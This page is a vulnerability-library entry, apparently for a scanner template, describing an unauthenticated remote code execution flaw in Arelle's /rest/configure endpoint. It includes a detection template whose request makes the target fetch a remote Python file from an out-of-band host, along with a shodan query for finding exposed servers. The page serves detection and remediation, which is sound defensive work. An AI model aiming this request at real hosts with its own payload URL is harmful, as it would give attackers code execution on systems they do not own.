/Vulnerability Library

Arelle < 2.39.10 - Remote Code Execution

CVE-2026-42796
Verified

Description

Arelle before 2.39.10 contains an unauthenticated remote code execution vulnerability in the webserver's /rest/configure endpoint. The plugins query parameter is forwarded to the plugin manager without authentication, allowing an attacker to supply a URL to a remote Python file that Arelle downloads and executes within its process.

Severity

Critical

CVSS Score

9.8

Exploit Probability

2%

Affected Product

arelle

Published Date

July 16, 2026

Template Author

aryu-ru

CVE-2026-42796.yaml
id: CVE-2026-42796

info:
  name: Arelle < 2.39.10 - Remote Code Execution
  author: aryu-ru
  severity: critical
  description: |
    Arelle before 2.39.10 contains an unauthenticated remote code execution vulnerability in the webserver's /rest/configure endpoint. The plugins query parameter is forwarded to the plugin manager without authentication, allowing an attacker to supply a URL to a remote Python file that Arelle downloads and executes within its process.
  impact: |
    Successful exploitation allows an unauthenticated attacker to execute arbitrary Python code with the privileges of the Arelle webserver process, leading to full host compromise.
  remediation: |
    Upgrade to Arelle 2.39.10 or later, which rejects remote URL plug-in references over the webserver.
  reference:
    - https://www.vulncheck.com/advisories/arelle-unauthenticated-rce-via-rest-configure
    - https://github.com/Arelle/Arelle/pull/2320
    - https://github.com/Arelle/Arelle/releases/tag/2.39.10
    - https://nvd.nist.gov/vuln/detail/CVE-2026-42796
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-42796
    epss-score: 0.02415
    epss-percentile: 0.82766
    cwe-id: CWE-306
  metadata:
    verified: true
    max-request: 1
    vendor: arelle
    product: arelle
    shodan-query: http.html:"Arelle Web Services"
  tags: cve,cve2026,arelle,rce,oast,unauth

http:
  - method: GET
    path:
      - "{{BaseURL}}/rest/configure?plugins=http://{{interactsh-url}}/{{randstr}}.py"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: body
        words:
          - "Configuration Request"

      - type: status
        status:
          - 200
# digest: 490a0046304402205ecae9264795b07ccc38d17d20a6b8ad9ee7e8ba0a541bb8eb06b3e705b2deb6022018487e486ce0067a095443adc85df1997a05d09a24066f8edf6e2d4cde7d9601:922c64590222798bb761d5b6d8e72950
9.8Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2026-42796
CWE ID:
cwe-306

References

https://www.vulncheck.com/advisories/arelle-unauthenticated-rce-via-rest-configurehttps://github.com/Arelle/Arelle/pull/2320https://github.com/Arelle/Arelle/releases/tag/2.39.10https://nvd.nist.gov/vuln/detail/CVE-2026-42796

Remediation Steps

Upgrade to Arelle 2.39.10 or later, which rejects remote URL plug-in references over the webserver.